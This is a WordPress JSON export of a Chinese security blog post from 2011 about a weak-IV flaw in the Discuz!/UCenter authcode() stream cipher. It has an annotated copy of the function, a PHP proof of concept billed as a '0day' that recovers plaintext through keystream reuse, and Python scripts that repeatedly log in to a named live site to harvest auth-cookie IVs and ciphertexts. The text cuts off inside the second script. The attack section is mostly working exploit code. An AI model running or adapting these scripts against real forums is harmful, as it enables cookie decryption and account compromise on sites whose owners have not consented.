﻿{"id":456,"date":"2011-11-17T18:28:45","date_gmt":"2011-11-17T10:28:45","guid":{"rendered":"http:\/\/notes.zerobox.org\/?p=456"},"modified":"2011-11-18T16:16:22","modified_gmt":"2011-11-18T08:16:22","slug":"discuz-authcode-%e5%bc%b1iv%e7%bc%ba%e9%99%b7","status":"publish","type":"post","link":"http:\/\/zerobox.org\/notes\/456.html","title":{"rendered":"Discuz! authcode() \u5f31IV\u7f3a\u9677"},"content":{"rendered":"<p>Discuz!\u7684authcode()\u51fd\u6570\u662f\u4e00\u4e2a\u7ecf\u5178\u7684\u6d41\u5bc6\u7801\u7b97\u6cd5\u5b9e\u73b0\uff0cdiscuz\u548cucenter\u7684\u5f88\u591a\u4ea7\u54c1\u90fd\u4f7f\u7528\u6b64\u51fd\u6570\u8fdb\u884c\u52a0\u89e3\u5bc6\u3002\u6211\u4ece\u7f51\u4e0a\u627e\u4e86\u4e00\u4efd\u7b97\u6cd5\u5206\u6790\uff0c\u5e76\u81ea\u5df1\u8865\u5145\u4e86\u4e00\u4e9b\u6ce8\u91ca\uff0c\u5982\u4e0b\uff08\u89c9\u5f97\u67af\u71e5\u7684\u670b\u53cb\u4e5f\u53ef\u4ee5\u8df3\u8fc7\u6b64\u90e8\u5206\uff0c\u4e0d\u5f71\u54cd\u9605\u8bfb\uff09\uff1a<\/p>\n<p>======================================================================<\/p>\n<p>&nbsp;<\/p>\n<p>\/\/ $string\uff1a \u660e\u6587 \u6216 \u5bc6\u6587<\/p>\n<p>\/\/ $operation\uff1aDECODE\u8868\u793a\u89e3\u5bc6,\u5176\u5b83\u8868\u793a\u52a0\u5bc6<\/p>\n<p>\/\/ $key\uff1a \u5bc6\u5319<\/p>\n<p>\/\/ $expiry\uff1a\u5bc6\u6587\u6709\u6548\u671f<\/p>\n<p>\/\/\u5b57\u7b26\u4e32\u89e3\u5bc6\u52a0\u5bc6<\/p>\n<p>function authcode($string, $operation = &#8216;DECODE&#8217;, $key = &#8221;, $expiry = 0) {<\/p>\n<p>\/\/ \u52a8\u6001\u5bc6\u5319\u957f\u5ea6\uff0c\u76f8\u540c\u7684\u660e\u6587\u4f1a\u751f\u6210\u4e0d\u540c\u5bc6\u6587\u5c31\u662f\u4f9d\u9760\u52a8\u6001\u5bc6\u5319 \u00a0(\u521d\u59cb\u5316\u5411\u91cfIV)<\/p>\n<p>$ckey_length = 4; \u00a0 \/\/ \u968f\u673a\u5bc6\u94a5\u957f\u5ea6 \u53d6\u503c 0-32;<\/p>\n<p>\/\/ \u52a0\u5165\u968f\u673a\u5bc6\u94a5\uff0c\u53ef\u4ee5\u4ee4\u5bc6\u6587\u65e0\u4efb\u4f55\u89c4\u5f8b\uff0c\u5373\u4fbf\u662f\u539f\u6587\u548c\u5bc6\u94a5\u5b8c\u5168\u76f8\u540c\uff0c\u52a0\u5bc6\u7ed3\u679c\u4e5f\u4f1a\u6bcf\u6b21\u4e0d\u540c\uff0c\u589e\u5927\u7834\u89e3\u96be\u5ea6\u3002\uff08\u5b9e\u9645\u4e0a\u5c31\u662fiv\uff09<\/p>\n<p>\/\/ \u53d6\u503c\u8d8a\u5927\uff0c\u5bc6\u6587\u53d8\u52a8\u89c4\u5f8b\u8d8a\u5927\uff0c\u5bc6\u6587\u53d8\u5316 = 16 \u7684 $ckey_length \u6b21\u65b9<\/p>\n<p>\/\/ \u5f53\u6b64\u503c\u4e3a 0 \u65f6\uff0c\u5219\u4e0d\u4ea7\u751f\u968f\u673a\u5bc6\u94a5<\/p>\n<p>\/\/ \u5bc6\u5319<\/p>\n<p>$key = md5($key ? $key : UC_KEY);<\/p>\n<p>\/\/ \u5bc6\u5319a\u4f1a\u53c2\u4e0e\u52a0\u89e3\u5bc6<\/p>\n<p>$keya = md5(substr($key, 0, 16));<\/p>\n<p>\/\/ \u5bc6\u5319b\u4f1a\u7528\u6765\u505a\u6570\u636e\u5b8c\u6574\u6027\u9a8c\u8bc1<\/p>\n<p>$keyb = md5(substr($key, 16, 16));<\/p>\n<p>\/\/ \u5bc6\u5319c\u7528\u4e8e\u53d8\u5316\u751f\u6210\u7684\u5bc6\u6587 \u00a0 (\u521d\u59cb\u5316\u5411\u91cfIV)<\/p>\n<p>$keyc = $ckey_length ? ($operation == &#8216;DECODE&#8217; ? substr($string, 0, $ckey_length): substr(<strong>md5(microtime())<\/strong>, -$ckey_length)) : &#8221;;<\/p>\n<p>\/\/ \u53c2\u4e0e\u8fd0\u7b97\u7684\u5bc6\u5319<\/p>\n<p>$cryptkey = $keya.md5($keya.$keyc);<\/p>\n<p>$key_length = strlen($cryptkey);<\/p>\n<p>\/\/ \u660e\u6587\uff0c\u524d10\u4f4d\u7528\u6765\u4fdd\u5b58\u65f6\u95f4\u6233\uff0c\u89e3\u5bc6\u65f6\u9a8c\u8bc1\u6570\u636e\u6709\u6548\u6027\uff0c10\u523026\u4f4d\u7528\u6765\u4fdd\u5b58$keyb(\u5bc6\u5319b)\uff0c\u89e3\u5bc6\u65f6\u4f1a\u901a\u8fc7\u8fd9\u4e2a\u5bc6\u5319\u9a8c\u8bc1\u6570\u636e\u5b8c\u6574\u6027<\/p>\n<p>\/\/ \u5982\u679c\u662f\u89e3\u7801\u7684\u8bdd\uff0c\u4f1a\u4ece\u7b2c$ckey_length\u4f4d\u5f00\u59cb\uff0c\u56e0\u4e3a\u5bc6\u6587\u524d$ckey_length\u4f4d\u4fdd\u5b58 \u52a8\u6001\u5bc6\u5319\uff0c\u4ee5\u4fdd\u8bc1\u89e3\u5bc6\u6b63\u786e<\/p>\n<p>$string = $operation == &#8216;DECODE&#8217; ? base64_decode(substr($string, $ckey_length)) : sprintf(&#8216;%010d&#8217;, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;<\/p>\n<p>$string_length = strlen($string);<\/p>\n<p>$result = &#8221;;<\/p>\n<p>$box = range(0, 255);<\/p>\n<p>$rndkey = array();<\/p>\n<p>\/\/ \u4ea7\u751f\u5bc6\u5319\u7c3f<\/p>\n<p>for($i = 0; $i &lt;= 255; $i++) {<\/p>\n<p>$rndkey[$i] = ord($cryptkey[$i % $key_length]);<\/p>\n<p>}<\/p>\n<p>\/\/ \u7528\u56fa\u5b9a\u7684\u7b97\u6cd5\uff0c\u6253\u4e71\u5bc6\u5319\u7c3f\uff0c\u589e\u52a0\u968f\u673a\u6027\uff0c\u597d\u50cf\u5f88\u590d\u6742\uff0c\u5b9e\u9645\u4e0a\u5bf9\u5e76\u4e0d\u4f1a\u589e\u52a0\u5bc6\u6587\u7684\u5f3a\u5ea6<\/p>\n<p>for($j = $i = 0; $i &lt; 256; $i++) {<\/p>\n<p>$j = ($j + $box[$i] + $rndkey[$i]) % 256;<\/p>\n<p>$tmp = $box[$i];<\/p>\n<p>$box[$i] = $box[$j];<\/p>\n<p>$box[$j] = $tmp;<\/p>\n<p>}<\/p>\n<p>\/\/ \u6838\u5fc3\u52a0\u89e3\u5bc6\u90e8\u5206<\/p>\n<p>for($a = $j = $i = 0; $i &lt; $string_length; $i++) {<\/p>\n<p>$a = ($a + 1) % 256;<\/p>\n<p>$j = ($j + $box[$a]) % 256;<\/p>\n<p>$tmp = $box[$a];<\/p>\n<p>$box[$a] = $box[$j];<\/p>\n<p>$box[$j] = $tmp;<\/p>\n<p>\/\/ \u4ece\u5bc6\u5319\u7c3f\u5f97\u51fa\u5bc6\u5319\u8fdb\u884c\u5f02\u6216\uff0c\u518d\u8f6c\u6210\u5b57\u7b26<\/p>\n<p><strong>\u00a0$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));<\/strong><\/p>\n<p>}<\/p>\n<p>if($operation == &#8216;DECODE&#8217;) {<\/p>\n<p>\/\/ \u9a8c\u8bc1\u6570\u636e\u6709\u6548\u6027\uff0c\u8bf7\u770b\u672a\u52a0\u5bc6\u660e\u6587\u7684\u683c\u5f0f<\/p>\n<p>if((substr($result, 0, 10) == 0 || substr($result, 0, 10) &#8211; time() &gt; 0) &amp;&amp; substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {<\/p>\n<p>return substr($result, 26);<\/p>\n<p>} else {<\/p>\n<p>return &#8221;;<\/p>\n<p>}<\/p>\n<p>} else {<\/p>\n<p>\/\/ \u628a\u52a8\u6001\u5bc6\u5319\u4fdd\u5b58\u5728\u5bc6\u6587\u91cc\uff0c\u8fd9\u4e5f\u662f\u4e3a\u4ec0\u4e48\u540c\u6837\u7684\u660e\u6587\uff0c\u751f\u4ea7\u4e0d\u540c\u5bc6\u6587\u540e\u80fd\u89e3\u5bc6\u7684\u539f\u56e0<\/p>\n<p>\/\/ \u56e0\u4e3a\u52a0\u5bc6\u540e\u7684\u5bc6\u6587\u53ef\u80fd\u662f\u4e00\u4e9b\u7279\u6b8a\u5b57\u7b26\uff0c\u590d\u5236\u8fc7\u7a0b\u53ef\u80fd\u4f1a\u4e22\u5931\uff0c\u6240\u4ee5\u7528base64\u7f16\u7801<\/p>\n<p>return $keyc.str_replace(&#8216;=&#8217;, &#8221;, base64_encode($result));<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>======================================================================<\/p>\n<p>\u5728\u8fd9\u4e2a\u51fd\u6570\u4e2d\uff0ckeyc \u5c31\u662fIV\uff08\u521d\u59cb\u5316\u5411\u91cf\uff09\uff0c ckey_length \u5c31\u662fIV\u7684\u957f\u5ea6\u3002$ckey_length = 0\u65f6\uff0c\u6ca1\u6709IV\u3002<\/p>\n<p>&nbsp;<\/p>\n<p>IV\u7684\u610f\u4e49\u5c31\u662f\u4e3a\u4e86\u4e00\u6b21\u4e00\u5bc6\uff0c\u5b83\u5f71\u54cd\u5230\u771f\u6b63\u6bcf\u6b21\u7528\u4e8e\u52a0\u5bc6\u7684XOR KEY\u3002<\/p>\n<p><a href=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/11.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-457\" title=\"1\" src=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/11.png\" alt=\"\" width=\"650\" height=\"233\" srcset=\"http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/11.png 650w, http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/11-300x107.png 300w\" sizes=\"auto, (max-width: 650px) 100vw, 650px\" \/><\/a><\/p>\n<p>\u800c\u201cReused Key Attack\u201d\u7684\u524d\u63d0\u5c31\u662f\u8981\u6c42XOR KEY\u662f\u76f8\u540c\u7684\u3002<strong>\u4f46discuz\u9ed8\u8ba4\u4f7f\u7528\u7684IV\u957f\u5ea6\u662f4\uff0c\u8fd9\u5e76\u4e0d\u662f\u4e00\u4e2a\u5f88\u5927\u7684\u503c<\/strong>\uff0c\u56e0\u6b64\u53ef\u4ee5\u904d\u5386\u51fa\u6240\u6709\u7684IV\u53ef\u80fd\u503c\u3002\u4e00\u65e6IV\u51fa\u73b0\u91cd\u590d\uff0c\u5c31\u610f\u5473\u7740XOR KEY\u4e5f\u91cd\u590d\u4e86\uff0c\u56e0\u6b64\u53ef\u4ee5\u5b9e\u65bd\u201cReused Key Attack\u201d\u3002<\/p>\n<p><a href=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/21.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-458\" title=\"2\" src=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/21.png\" alt=\"\" width=\"594\" height=\"429\" srcset=\"http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/21.png 594w, http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/21-300x216.png 300w\" sizes=\"auto, (max-width: 594px) 100vw, 594px\" \/><\/a><\/p>\n<p><strong>\u5982\u4e0b\u6f14\u793a\u4ee3\u7801<\/strong>\uff1a<\/p>\n<p>&nbsp;<\/p>\n<p>&lt;?php<\/p>\n<p>&nbsp;<\/p>\n<p>define(&#8216;UC_KEY&#8217;,&#8217;asdfasfas&#8217;);<\/p>\n<p>&nbsp;<\/p>\n<p>$plaintext1 = &#8220;2626&#8221;;<\/p>\n<p>$plaintext2 = &#8220;2630&#8221;;<\/p>\n<p>&nbsp;<\/p>\n<p>$guess_result = &#8220;&#8221;;<\/p>\n<p>&nbsp;<\/p>\n<p>$time_start = time();<\/p>\n<p>&nbsp;<\/p>\n<p>$dict = array();<\/p>\n<p>global $ckey_length;<\/p>\n<p>$ckey_length = 4;<\/p>\n<p>&nbsp;<\/p>\n<p>echo &#8220;== Discuz\/UCenter authcode() stream cipher attack exploit v2(crack plaintext)\\n&#8221;;<\/p>\n<p>echo &#8220;== 0day by axis ==\\n&#8221;;<\/p>\n<p>echo &#8220;== 2011.9.2 ==\\n\\n&#8221;;<\/p>\n<p>&nbsp;<\/p>\n<p>echo &#8220;Collecting Dictionary(XOR Keys).\\n&#8221;;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>$cipher2 = authcode($plaintext2, &#8220;ENCODE&#8221; , UC_KEY);<\/p>\n<p>&nbsp;<\/p>\n<p>$counter = 0;<\/p>\n<p>for (;;){<\/p>\n<p>$counter ++;<\/p>\n<p>$cipher1 = authcode($plaintext1, &#8220;ENCODE&#8221; , UC_KEY);<\/p>\n<p>$keyc1 = substr($cipher1, 0, $ckey_length);<\/p>\n<p>$cipher1 = base64_decode(substr($cipher1, $ckey_length));<\/p>\n<p>$dict[$keyc1] = $cipher1;<\/p>\n<p>if \u00a0( $counter%1000 == 0){<\/p>\n<p>echo &#8220;.&#8221;;<\/p>\n<p>if ($guess_result = guess($dict, $cipher2)){<\/p>\n<p>break;<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>array_unique($dict);<\/p>\n<p>&nbsp;<\/p>\n<p>echo &#8220;\\nDictionary Collecting Finished..\\n&#8221;;<\/p>\n<p>echo &#8220;Collected &#8220;.count($dict).&#8221; XOR Keys\\n&#8221;;<\/p>\n<p>&nbsp;<\/p>\n<p>function guess($dict, $cipher2){<\/p>\n<p>global $plaintext1,$ckey_length;<\/p>\n<p>&nbsp;<\/p>\n<p>$keyc2 = substr($cipher2, 0, $ckey_length);<\/p>\n<p>$cipher2 = base64_decode(substr($cipher2, $ckey_length));<\/p>\n<p>&nbsp;<\/p>\n<p>for ($i=0; $i&lt;count($dict); $i++){<\/p>\n<p>if (array_key_exists($keyc2, $dict)){<\/p>\n<p>echo &#8220;\\nFound key in dictionary!\\n&#8221;;<\/p>\n<p>echo &#8220;keyc is: &#8220;.$keyc2.&#8221;\\n&#8221;;<\/p>\n<p>return crack($plaintext1,$dict[$keyc2],$cipher2);<\/p>\n<p>break;<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>return False;<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>echo &#8220;\\ncounter is:&#8221;.$counter.&#8221;\\n&#8221;;<\/p>\n<p>$time_spend = time() &#8211; $time_start;<\/p>\n<p>echo &#8220;crack time is: &#8220;.$time_spend.&#8221; seconds \\n&#8221;;<\/p>\n<p>echo &#8220;crack result is :&#8221;.$guess_result.&#8221;\\n&#8221;;<\/p>\n<p>&nbsp;<\/p>\n<p>function crack($plain, $cipher_p, $cipher_t){<\/p>\n<p>$target = &#8221;;<\/p>\n<p>$tmp_p = substr($cipher_p, 26);<\/p>\n<p>echo hex($tmp_p).&#8221;\\n&#8221;;<\/p>\n<p>$tmp_t = substr($cipher_t, 26);<\/p>\n<p>echo hex($tmp_t).&#8221;\\n&#8221;;<\/p>\n<p>for ($i=0;$i&lt;strlen($plain);$i++){<\/p>\n<p>$target .= chr(ord($plain[$i]) ^ ord($tmp_p[$i]) ^ ord($tmp_t[$i]));<\/p>\n<p>}<\/p>\n<p>return $target;<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>function hex($str){<\/p>\n<p>$result = &#8221;;<\/p>\n<p>for ($i=0;$i&lt;strlen($str);$i++){<\/p>\n<p>$result .= &#8220;\\\\&#8221;.ord($str[$i]);<\/p>\n<p>}<\/p>\n<p>return $result;<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>function authcode($string, $operation = &#8216;DECODE&#8217;, $key = &#8221;, $expiry = 0) {<\/p>\n<p>&nbsp;<\/p>\n<p>global $ckey_length;<\/p>\n<p>\/\/$ckey_length = 4;<\/p>\n<p>&nbsp;<\/p>\n<p>$key = md5($key ? $key : UC_KEY);<\/p>\n<p>$keya = md5(substr($key, 0, 16));<\/p>\n<p>$keyb = md5(substr($key, 16, 16));<\/p>\n<p>$keyc = $ckey_length ? ($operation == &#8216;DECODE&#8217; ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : &#8221;;<\/p>\n<p>&nbsp;<\/p>\n<p>$cryptkey = $keya.md5($keya.$keyc);<\/p>\n<p>$key_length = strlen($cryptkey);<\/p>\n<p>&nbsp;<\/p>\n<p>$string = $operation == &#8216;DECODE&#8217; ? base64_decode(substr($string, $ckey_length)) : sprintf(&#8216;%010d&#8217;, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;<\/p>\n<p>$string_length = strlen($string);<\/p>\n<p>&nbsp;<\/p>\n<p>$result = &#8221;;<\/p>\n<p>$box = range(0, 255);<\/p>\n<p>&nbsp;<\/p>\n<p>$rndkey = array();<\/p>\n<p>for($i = 0; $i &lt;= 255; $i++) {<\/p>\n<p>$rndkey[$i] = ord($cryptkey[$i % $key_length]);<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>for($j = $i = 0; $i &lt; 256; $i++) {<\/p>\n<p>$j = ($j + $box[$i] + $rndkey[$i]) % 256;<\/p>\n<p>$tmp = $box[$i];<\/p>\n<p>$box[$i] = $box[$j];<\/p>\n<p>$box[$j] = $tmp;<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>\/\/$xx = &#8221;; \/\/ real key<\/p>\n<p>for($a = $j = $i = 0; $i &lt; $string_length; $i++) {<\/p>\n<p>$a = ($a + 1) % 256;<\/p>\n<p>$j = ($j + $box[$a]) % 256;<\/p>\n<p>$tmp = $box[$a];<\/p>\n<p>$box[$a] = $box[$j];<\/p>\n<p>$box[$j] = $tmp;<\/p>\n<p>\/\/$xx .= chr($box[($box[$a] + $box[$j]) % 256]);<\/p>\n<p>$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));<\/p>\n<p>}<\/p>\n<p>\/\/echo &#8220;xor key is: &#8220;.hex($xx).&#8221;\\n&#8221;;<\/p>\n<p>&nbsp;<\/p>\n<p>if($operation == &#8216;DECODE&#8217;) {<\/p>\n<p>if((substr($result, 0, 10) == 0 || substr($result, 0, 10) &#8211; time() &gt; 0) &amp;&amp; substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {<\/p>\n<p>return substr($result, 26);<\/p>\n<p>} else {<\/p>\n<p>return &#8221;;<\/p>\n<p>}<\/p>\n<p>} else {<\/p>\n<p>return $keyc.str_replace(&#8216;=&#8217;, &#8221;, base64_encode($result));<\/p>\n<p>}<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>?&gt;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>\u6d4b\u8bd5\u6548\u679c\uff1a<\/p>\n<p><a href=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/31.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-459\" title=\"3\" src=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/31.png\" alt=\"\" width=\"596\" height=\"429\" srcset=\"http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/31.png 596w, http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/31-300x215.png 300w\" sizes=\"auto, (max-width: 596px) 100vw, 596px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/41.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-460\" title=\"4\" src=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/41.png\" alt=\"\" width=\"554\" height=\"340\" srcset=\"http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/41.png 554w, http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/41-300x184.png 300w\" sizes=\"auto, (max-width: 554px) 100vw, 554px\" \/><\/a><\/p>\n<p>\u5728\u5b9e\u9645\u4e92\u8054\u7f51\u4e2d\uff0c\u8981\u5f3a\u8feb\u51fa\u73b0\u91cd\u590d\u7684IV\u4e5f\u4e0d\u662f\u4ec0\u4e48\u96be\u4e8b\u3002IV\u4e0d\u662f\u4fdd\u5bc6\u4fe1\u606f\uff0c\u5bc6\u6587\u7684\u524d4\u5b57\u8282\u5c31\u662fIV\u7684\u503c\u3002<\/p>\n<p><a href=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/51.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-461\" title=\"5\" src=\"http:\/\/notes.zerobox.org\/wp-content\/uploads\/2011\/11\/51.png\" alt=\"\" width=\"598\" height=\"429\" srcset=\"http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/51.png 598w, http:\/\/zerobox.org\/notes\/wp-content\/uploads\/2011\/11\/51-300x215.png 300w\" sizes=\"auto, (max-width: 598px) 100vw, 598px\" \/><\/a><\/p>\n<p>\u4ee5\u4e0b<strong>\u6f14\u793a\u4ee3\u7801<\/strong>\uff0c\u5c06\u4ece\u4e00\u4e2a\u7f51\u7ad9\u4e2d\u904d\u5386\u51fa\u91cd\u590d\u7684IV\u3002<\/p>\n<p>\u6bcf\u6b21\u8bf7\u6c42\u6293\u53d6\u5230\u7684\u5bc6\u6587\u548cIV\uff0c\u4f1a\u5b58\u653e\u5728\u672c\u5730\u6570\u636e\u5e93\u4e2d\u3002\u901a\u8fc7\u53e6\u4e00\u4e2a\u7a0b\u5e8f\u5468\u671f\u6027\u7684\u67e5\u8be2\u6570\u636e\u5e93\uff0c\u770b\u662f\u5426\u51fa\u73b0\u4e86\u91cd\u590d\u7684IV\u3002\u6839\u636ebirthday attack\u7684\u539f\u7406\uff0c\u542f\u52a8\u4e86\u4e24\u4e2a\u6293\u53d6\u8fdb\u7a0b\uff08\u6ce8\u518c\u4e86\u4e24\u4e2a\u7f51\u7ad9\u7528\u6237\uff0c\u4ee5\u4fbf\u4ea7\u751f\u51fa\u4e0d\u540c\u7684\u660e\u6587\u7528\u4e8e\u52a0\u5bc6\uff09\uff0c\u5206\u522b\u5c06\u53d6\u56de\u7684\u5bc6\u6587\u5b58\u5728\u4e24\u5f20\u8868\u91cc\u3002\u4e24\u4e2a\u6293\u53d6\u7a0b\u5e8f\u7684\u4ee3\u7801\u662f\u4e00\u6837\u7684\u3002\u7531\u4e8e\u65f6\u95f4\u5173\u7cfb\uff0c\u6ca1\u6709\u518d\u6b21\u4f18\u5316\u8fd9\u4e2aPOC\u4e86\u3002<\/p>\n<p>grab_cipher1.py\uff1a<\/p>\n<p>&nbsp;<\/p>\n<p>======================================================================<\/p>\n<p>import string<\/p>\n<p>import urllib2<\/p>\n<p>import urllib<\/p>\n<p>#from urlparse import urlparse<\/p>\n<p>import httplib<\/p>\n<p>import Cookie<\/p>\n<p>import sqlite3<\/p>\n<p>import base64<\/p>\n<p>import operator<\/p>\n<p>&nbsp;<\/p>\n<p>#url = &#8220;http:\/\/photo003.com\/member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;infloat=yes&amp;lssubmit=yes&amp;inajax=1&#8221;<\/p>\n<p>#req = urllib2.Request(url,data,headers)<\/p>\n<p>#f = urllib2.urlopen(req)<\/p>\n<p>&nbsp;<\/p>\n<p># Step1 get cipher1 of plaintext1 to generate dictionary<\/p>\n<p>&nbsp;<\/p>\n<p>dbcon = sqlite3.connect(&#8216;.\/authcode.db&#8217;)<\/p>\n<p>c = dbcon.cursor()<\/p>\n<p># \u5982\u679c\u662f\u7b2c\u4e00\u6b21\u6267\u884c\uff0c\u9700\u8981\u521b\u5efa\u8868\uff0c\u4e4b\u540e\u5219\u4e0d\u518d\u9700\u8981<\/p>\n<p>#c.execute(&#8216;CREATE TABLE photo003_2626(id INTEGER PRIMARY KEY, iv VARCHAR(32), cipher TEXT)&#8217;)<\/p>\n<p>&nbsp;<\/p>\n<p>dbcon.text_factory = str<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>for i in range(0,10000):<\/p>\n<p>headers = {&#8216;User-Agent&#8217;:&#8217;Mozilla\/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.20) Gecko\/20110803 Firefox\/3.6.20&#8242;,<\/p>\n<p>&#8216;Content-Type&#8217;:&#8217;application\/x-www-form-urlencoded&#8217;,<\/p>\n<p>&#8216;Referer&#8217;:&#8217;http:\/\/photo003.com\/&#8217;,<\/p>\n<p>&#8216;Cookie&#8217;:&#8217;79uz_d57e_lastvisit=1315289799; 79uz_d57e_sid=mwblLl; 79uz_d57e_lastact=1315293401%09home.php%09misc; 79uz_d57e_sendmail=1; pgv_pvi=5521148000; pgv_info=ssi=s4855221700; cnzz_a2048277=0; sin2048277=; rtime=0; ltime=1315293240710; cnzz_eid=24694723-1315293457-; lzstat_uv=25192795223599758253|1758779; lzstat_ss=273007993_0_1315322042_1758779&#8242;}<\/p>\n<p>data = {&#8216;username&#8217;:&#8217;\u8bf7\u66ff\u6362username&#8217;,&#8217;password&#8217;:&#8217;\u8bf7\u66ff\u6362pass&#8217;,&#8217;quickforward&#8217;:&#8217;yes&#8217;,&#8217;handlekey&#8217;:&#8217;ls&#8217;}<\/p>\n<p>data = urllib.urlencode(data)<\/p>\n<p>&nbsp;<\/p>\n<p>conn = httplib.HTTPConnection(&#8220;photo003.com&#8221;)<\/p>\n<p>conn.request(&#8216;POST&#8217;,<\/p>\n<p>&#8216;\/member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;infloat=yes&amp;lssubmit=yes&amp;inajax=1&#8217;,<\/p>\n<p>data,<\/p>\n<p>headers)<\/p>\n<p>&nbsp;<\/p>\n<p>res = conn.getresponse()<\/p>\n<p>&nbsp;<\/p>\n<p>if res:<\/p>\n<p>cookies = Cookie.SimpleCookie()<\/p>\n<p>cookies.load(res.getheader(&#8220;Set-Cookie&#8221;))<\/p>\n<p>&nbsp;<\/p>\n<p>authcookie = urllib.unquote(cookies[&#8220;79uz_d57e_auth&#8221;].value)<\/p>\n<p>iv = authcookie[0:4]<\/p>\n<p>cipher = base64.b64decode(authcookie[4:])<\/p>\n<p>c.execute(&#8216;INSERT INTO\u00a0<strong>photo003_2626(iv, cipher)<\/strong>\u00a0VALUES (?, ?)&#8217;,(iv, cipher))<\/p>\n<p>&nbsp;<\/p>\n<p>dbcon.commit()<\/p>\n<p>print str(i) + &#8216; \u00a0 &#8216; + iv<\/p>\n<p>&nbsp;<\/p>\n<p>======================================================================<\/p>\n<p>&nbsp;<\/p>\n<p>grab_cipher2.py\uff1a<\/p>\n<p>======================================================================<\/p>\n<p>&nbsp;<\/p>\n<p>import string<\/p>\n<p>import urllib2<\/p>\n<p>import urllib<\/p>\n<p>#from urlparse import urlparse<\/p>\n<p>import httplib<\/p>\n<p>import Cookie<\/p>\n<p>import sqlite3<\/p>\n<p>import base64<\/p>\n<p>import operator<\/p>\n<p>&nbsp;<\/p>\n<p>#url = &#8220;http:\/\/photo003.com\/member.php?mod=logging&amp;action=login&amp;loginsubmit=yes&amp;infloat=yes&amp;lssubmit=yes&amp;inajax=1&#8221;<\/p>\n<p>#req = urllib2.Request(url,data,headers)<\/p>\n<p>#f = urllib2.urlopen(req)<\/p>\n<p>&nbsp;<\/p>\n<p># Step1 get cipher1 of plaintext1 to generate dictionary<\/p>\n<p>&nbsp;<\/p>\n<p>dbcon = sqlite3.connect(&#8216;.\/authcode.db&#8217;)<\/p>\n<p>c = dbcon.cursor()<\/p>\n<p>#c.execute(&#8216;CREATE TABLE photo003_2630(id INTEGER PRIMARY KEY, iv VARCHAR(32), cipher TEXT)&#8217;)<\/p>\n<p>&nbsp;<\/p>\n<p>dbcon.text_factory = str<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>for i in range(0,10000):<\/p>\n<p>headers = {&#8216;User-Agent&#8217;:&#8217;Mozilla\/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.20) Gecko\/20110803 Firefox\/3.6.20&#8242;,<\/p>\n<p>&#8216;Content-Type&#8217;:&#8217;application\/x-www-form-urlencoded&#8217;,<\/p>\n<p>&#8216;Referer&#8217;:&#8217;http:\/\/photo003.com\/&#8217;,<\/p>\n<p>&#8216;Cookie&#8217;:&#8217;79uz_d57e_lastvisit=1315289799; 79uz_d57e_sid=mwblLl; 79uz_d57e_lastact=1315293401%09home.php%09misc; 79uz_d57e_sendmail=1; pgv_pvi=5521148000; pgv_info=ssi=s4855221700; cnzz_a2048277=0; sin2048277=; rtime=0; ltime=1315293240710; cnzz_eid=24694723-1315293457-; lzstat_uv=25192795223599758253|1758779; lzstat_ss=273007993_0_1315322042_1758779&#8242;}<\/p>\n<p>data = 